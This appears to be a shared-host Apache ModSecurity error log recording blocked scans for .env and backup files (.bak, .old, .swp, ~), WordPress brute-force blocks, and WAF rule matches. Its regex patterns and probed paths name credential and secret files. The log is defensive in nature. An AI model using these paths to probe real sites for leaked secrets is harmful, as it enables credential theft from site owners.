[Tue May 26 17:36:20.479263 2026] [security2:error] [pid 894579:tid 894779] [client 208.84.100.173:36238] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webdisk.thedebateafrica.org"] [uri "/___proxy_subdomain_webdisk/.env"] [unique_id "ahWMvAEtZWuWWBGzl__t0QAAAU4"]
[Tue May 26 17:36:20.487011 2026] [core:error] [pid 891273:tid 891420] [client 208.84.100.173:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 17:36:20.487031 2026] [core:error] [pid 891273:tid 891420] [client 208.84.100.173:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 17:36:20.534206 2026] [security2:error] [pid 891273:tid 891406] [client 57.141.2.40:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWMvMDEzZ8z3jtDm8242QAAAAM"]
[Tue May 26 17:36:20.563655 2026] [security2:error] [pid 894579:tid 894747] [client 208.84.100.173:36158] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webdisk.thedebateafrica.org"] [uri "/___proxy_subdomain_webdisk/app/.env"] [unique_id "ahWMvAEtZWuWWBGzl__t0wAAAS8"]
[Tue May 26 17:36:20.574217 2026] [core:error] [pid 891273:tid 891434] [client 208.84.100.173:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 17:36:20.574232 2026] [core:error] [pid 891273:tid 891434] [client 208.84.100.173:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 17:36:20.579309 2026] [core:error] [pid 891273:tid 891408] [client 208.84.100.173:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 17:36:20.579327 2026] [core:error] [pid 891273:tid 891408] [client 208.84.100.173:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 17:36:20.580574 2026] [security2:error] [pid 894579:tid 894766] [client 208.84.100.173:36202] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webdisk.thedebateafrica.org"] [uri "/___proxy_subdomain_webdisk/backend/.env"] [unique_id "ahWMvAEtZWuWWBGzl__t1gAAAUI"]
[Tue May 26 17:36:20.580818 2026] [security2:error] [pid 894579:tid 894741] [client 208.84.100.173:36164] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webdisk.thedebateafrica.org"] [uri "/___proxy_subdomain_webdisk/api/.env"] [unique_id "ahWMvAEtZWuWWBGzl__t1wAAASk"]
[Tue May 26 17:36:21.174586 2026] [security2:error] [pid 891273:tid 891490] [client 104.207.40.7:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWMvcDEzZ8z3jtDm8248gAAAFc"], referer: https://anujtradingco.com/
[Tue May 26 17:36:21.277385 2026] [core:error] [pid 891273:tid 891471] [client 208.84.100.173:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 17:36:21.277408 2026] [core:error] [pid 891273:tid 891471] [client 208.84.100.173:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 17:36:21.569965 2026] [security2:error] [pid 894579:tid 894743] [client 208.84.100.173:36142] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.copy$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1269"] [id "390586"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .copy)"] [severity "CRITICAL"] [hostname "webdisk.thedebateafrica.org"] [uri "/___proxy_subdomain_webdisk/.env.production.copy"] [unique_id "ahWMvQEtZWuWWBGzl__t3gAAASs"]
[Tue May 26 17:36:21.581032 2026] [core:error] [pid 894579:tid 894826] [client 208.84.100.173:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 17:36:21.581055 2026] [core:error] [pid 894579:tid 894826] [client 208.84.100.173:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 17:36:21.581613 2026] [core:error] [pid 891273:tid 891444] [client 208.84.100.173:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 17:36:21.581640 2026] [core:error] [pid 891273:tid 891444] [client 208.84.100.173:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 17:36:22.191935 2026] [security2:error] [pid 891273:tid 891429] [client 57.141.2.7:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWMvcDEzZ8z3jtDm825BwAAABo"]
[Tue May 26 17:36:22.270769 2026] [core:error] [pid 894579:tid 894767] [client 208.84.100.173:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 17:36:22.270798 2026] [core:error] [pid 894579:tid 894767] [client 208.84.100.173:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 17:36:22.358409 2026] [security2:error] [pid 894579:tid 894723] [client 208.84.100.173:54782] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "webdisk.thedebateafrica.org"] [uri "/___proxy_subdomain_webdisk/.env.local.old"] [unique_id "ahWMvgEtZWuWWBGzl__t7AAAARc"]
[Tue May 26 17:36:22.362308 2026] [security2:error] [pid 894579:tid 894805] [client 208.84.100.173:54802] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sw[a-z]$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1275"] [id "390587"] [rev "5"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .sw)"] [severity "CRITICAL"] [hostname "webdisk.thedebateafrica.org"] [uri "/___proxy_subdomain_webdisk/.env.local.swp"] [unique_id "ahWMvgEtZWuWWBGzl__t7QAAAWg"]
[Tue May 26 17:36:22.456585 2026] [security2:error] [pid 894579:tid 894817] [client 208.84.100.173:54710] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "webdisk.thedebateafrica.org"] [uri "/___proxy_subdomain_webdisk/.env.old"] [unique_id "ahWMvgEtZWuWWBGzl__t8QAAAXQ"]
[Tue May 26 17:36:22.457469 2026] [security2:error] [pid 894579:tid 894772] [client 208.84.100.173:54738] ModSecurity: Access denied with code 406 (phase 2). Pattern match "[a-z0-9]~$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1257"] [id "390581"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data Leakage - attempt to access backup file (disable this rule if you require access to files that end with a tilde)"] [severity "CRITICAL"] [hostname "webdisk.thedebateafrica.org"] [uri "/___proxy_subdomain_webdisk/.env~"] [unique_id "ahWMvgEtZWuWWBGzl__t8wAAAUc"]
[Tue May 26 17:36:22.457587 2026] [security2:error] [pid 894579:tid 894813] [client 208.84.100.173:54744] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sw[a-z]$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1275"] [id "390587"] [rev "5"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .sw)"] [severity "CRITICAL"] [hostname "webdisk.thedebateafrica.org"] [uri "/___proxy_subdomain_webdisk/.env.swp"] [unique_id "ahWMvgEtZWuWWBGzl__t9AAAAXA"]
[Tue May 26 17:36:22.458548 2026] [security2:error] [pid 894579:tid 894736] [client 208.84.100.173:54788] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "webdisk.thedebateafrica.org"] [uri "/___proxy_subdomain_webdisk/.env.local.backup"] [unique_id "ahWMvgEtZWuWWBGzl__t9QAAASQ"]
[Tue May 26 17:36:22.461057 2026] [security2:error] [pid 894579:tid 894754] [client 208.84.100.173:54754] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.orig$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1266"] [id "390584"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .orig)"] [severity "CRITICAL"] [hostname "webdisk.thedebateafrica.org"] [uri "/___proxy_subdomain_webdisk/.env.orig"] [unique_id "ahWMvgEtZWuWWBGzl__t9wAAATY"]
[Tue May 26 17:36:22.461906 2026] [security2:error] [pid 894579:tid 894746] [client 208.84.100.173:54768] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.copy$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1269"] [id "390586"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .copy)"] [severity "CRITICAL"] [hostname "webdisk.thedebateafrica.org"] [uri "/___proxy_subdomain_webdisk/.env.copy"] [unique_id "ahWMvgEtZWuWWBGzl__t-AAAAS4"]
[Tue May 26 17:36:22.474163 2026] [security2:error] [pid 894579:tid 894825] [client 208.84.100.173:54816] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.orig$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1266"] [id "390584"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .orig)"] [severity "CRITICAL"] [hostname "webdisk.thedebateafrica.org"] [uri "/___proxy_subdomain_webdisk/.env.local.orig"] [unique_id "ahWMvgEtZWuWWBGzl__t-QAAAXw"]
[Tue May 26 17:36:22.475949 2026] [core:error] [pid 891273:tid 891497] [client 208.84.100.173:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 17:36:22.475961 2026] [core:error] [pid 891273:tid 891497] [client 208.84.100.173:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 17:36:22.485171 2026] [security2:error] [pid 891273:tid 891436] [client 208.84.100.173:54830] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.copy$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1269"] [id "390586"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .copy)"] [severity "CRITICAL"] [hostname "webdisk.thedebateafrica.org"] [uri "/___proxy_subdomain_webdisk/.env.local.copy"] [unique_id "ahWMvsDEzZ8z3jtDm825EAAAACE"]
[Tue May 26 17:36:22.485671 2026] [security2:error] [pid 891273:tid 891410] [client 208.84.100.173:54862] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "webdisk.thedebateafrica.org"] [uri "/___proxy_subdomain_webdisk/.env.production.backup"] [unique_id "ahWMvsDEzZ8z3jtDm825EgAAAAc"]
[Tue May 26 17:36:22.486269 2026] [security2:error] [pid 891273:tid 891452] [client 208.84.100.173:54706] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "webdisk.thedebateafrica.org"] [uri "/___proxy_subdomain_webdisk/.env.bak"] [unique_id "ahWMvsDEzZ8z3jtDm825FAAAADE"]
[Tue May 26 17:36:22.487182 2026] [security2:error] [pid 894579:tid 894815] [client 208.84.100.173:54798] ModSecurity: Access denied with code 406 (phase 2). Pattern match "[a-z0-9]~$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1257"] [id "390581"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data Leakage - attempt to access backup file (disable this rule if you require access to files that end with a tilde)"] [severity "CRITICAL"] [hostname "webdisk.thedebateafrica.org"] [uri "/___proxy_subdomain_webdisk/.env.local~"] [unique_id "ahWMvgEtZWuWWBGzl__t_AAAAXI"]
[Tue May 26 17:36:22.487324 2026] [security2:error] [pid 891273:tid 891421] [client 208.84.100.173:54842] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "webdisk.thedebateafrica.org"] [uri "/___proxy_subdomain_webdisk/.env.production.bak"] [unique_id "ahWMvsDEzZ8z3jtDm825FgAAABI"]
[Tue May 26 17:36:22.488366 2026] [security2:error] [pid 891273:tid 891460] [client 208.84.100.173:54714] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "webdisk.thedebateafrica.org"] [uri "/___proxy_subdomain_webdisk/.env.backup"] [unique_id "ahWMvsDEzZ8z3jtDm825FQAAADk"]
[Tue May 26 17:36:22.488378 2026] [security2:error] [pid 891273:tid 891468] [client 208.84.100.173:54886] ModSecurity: Access denied with code 406 (phase 2). Pattern match "[a-z0-9]~$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1257"] [id "390581"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data Leakage - attempt to access backup file (disable this rule if you require access to files that end with a tilde)"] [severity "CRITICAL"] [hostname "webdisk.thedebateafrica.org"] [uri "/___proxy_subdomain_webdisk/.env.production~"] [unique_id "ahWMvsDEzZ8z3jtDm825FwAAAEE"]
[Tue May 26 17:36:22.499666 2026] [core:error] [pid 891273:tid 891484] [client 208.84.100.173:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 17:36:22.499680 2026] [core:error] [pid 891273:tid 891484] [client 208.84.100.173:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 17:36:22.499748 2026] [core:error] [pid 894579:tid 894810] [client 208.84.100.173:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 17:36:22.499768 2026] [core:error] [pid 894579:tid 894810] [client 208.84.100.173:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 17:36:22.500321 2026] [core:error] [pid 894579:tid 894739] [client 208.84.100.173:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 17:36:22.500333 2026] [core:error] [pid 894579:tid 894739] [client 208.84.100.173:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 17:36:22.500708 2026] [core:error] [pid 894579:tid 894780] [client 208.84.100.173:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 17:36:22.500723 2026] [core:error] [pid 894579:tid 894780] [client 208.84.100.173:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 17:36:22.668712 2026] [security2:error] [pid 894579:tid 894818] [client 208.84.100.173:54782] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "webdisk.thedebateafrica.org"] [uri "/___proxy_subdomain_webdisk/.env.production.old"] [unique_id "ahWMvgEtZWuWWBGzl__uAgAAAXU"]
[Tue May 26 17:36:22.671123 2026] [security2:error] [pid 894579:tid 894752] [client 208.84.100.173:54724] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "webdisk.thedebateafrica.org"] [uri "/___proxy_subdomain_webdisk/.env.local.bak"] [unique_id "ahWMvgEtZWuWWBGzl__uAwAAATQ"]
[Tue May 26 17:36:22.672084 2026] [security2:error] [pid 891273:tid 891423] [client 208.84.100.173:54854] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sw[a-z]$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1275"] [id "390587"] [rev "5"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .sw)"] [severity "CRITICAL"] [hostname "webdisk.thedebateafrica.org"] [uri "/___proxy_subdomain_webdisk/.env.production.swp"] [unique_id "ahWMvsDEzZ8z3jtDm825HQAAABQ"]
[Tue May 26 17:36:22.672801 2026] [security2:error] [pid 894579:tid 894829] [client 208.84.100.173:54916] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.orig$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1266"] [id "390584"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .orig)"] [severity "CRITICAL"] [hostname "webdisk.thedebateafrica.org"] [uri "/___proxy_subdomain_webdisk/.env.production.orig"] [unique_id "ahWMvgEtZWuWWBGzl__uBAAAAYA"]
[Tue May 26 17:36:22.681732 2026] [core:error] [pid 894579:tid 894798] [client 208.84.100.173:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 17:36:22.681746 2026] [core:error] [pid 894579:tid 894798] [client 208.84.100.173:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 17:36:23.592439 2026] [core:error] [pid 894579:tid 894718] [client 208.84.100.173:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 17:36:23.592461 2026] [core:error] [pid 894579:tid 894718] [client 208.84.100.173:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 17:36:23.885763 2026] [security2:error] [pid 891273:tid 891405] [client 123.27.109.143:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWMv8DEzZ8z3jtDm825JQAAAAI"]
[Tue May 26 17:36:24.300567 2026] [security2:error] [pid 894579:tid 894674] [remote 65.2.90.30:57114] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.90.2.65.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/wp-login.php"] [unique_id "ahWMwAEtZWuWWBGzl__uJwABfV4"]
[Tue May 26 17:36:25.183660 2026] [security2:error] [pid 894579:tid 894740] [client 57.141.2.52:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWMwAEtZWuWWBGzl__uNwAAASg"]
[Tue May 26 17:36:27.673923 2026] [security2:error] [pid 891273:tid 891409] [client 57.141.2.20:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWMw8DEzZ8z3jtDm825RQAAAAY"]
[Tue May 26 17:36:29.296219 2026] [security2:error] [pid 894579:tid 894637] [remote 65.2.90.30:57124] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.90.2.65.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWMxQEtZWuWWBGzl__ugAABSzk"]
[Tue May 26 17:36:29.838851 2026] [security2:error] [pid 894579:tid 894729] [client 57.141.2.14:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWMxQEtZWuWWBGzl__ugwAAAR0"]
[Tue May 26 17:36:29.841157 2026] [security2:error] [pid 891273:tid 891491] [client 223.235.98.214:24998] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 214.98.235.223.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahWMxcDEzZ8z3jtDm825WgAAAFg"]
[Tue May 26 17:36:29.841336 2026] [security2:error] [pid 891273:tid 891491] [client 223.235.98.214:24998] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahWMxcDEzZ8z3jtDm825WgAAAFg"]
[Tue May 26 17:36:29.912306 2026] [security2:error] [pid 891273:tid 891403] [client 5.39.1.234:29150] ModSecurity: Access denied with code 406 (phase 1). Pattern match "Mozilla\\\\/5\\\\.0 \\\\(compatible; AhrefsBot\\\\/\\\\d\\\\.\\\\d; \\\\+http:\\\\/\\\\/ahrefs\\\\.com\\\\/robot\\\\/\\\\)" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "578"] [id "900165"] [msg "AhrefsBot BOT Request"] [hostname "consola.co"] [uri "/robots.txt"] [unique_id "ahWMxcDEzZ8z3jtDm825XAAAAAA"]
[Tue May 26 17:36:29.912394 2026] [security2:error] [pid 891273:tid 891403] [client 5.39.1.234:29150] ModSecurity: Warning. Matched phrase "AhrefsBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "consola.co"] [uri "/robots.txt"] [unique_id "ahWMxcDEzZ8z3jtDm825XAAAAAA"]
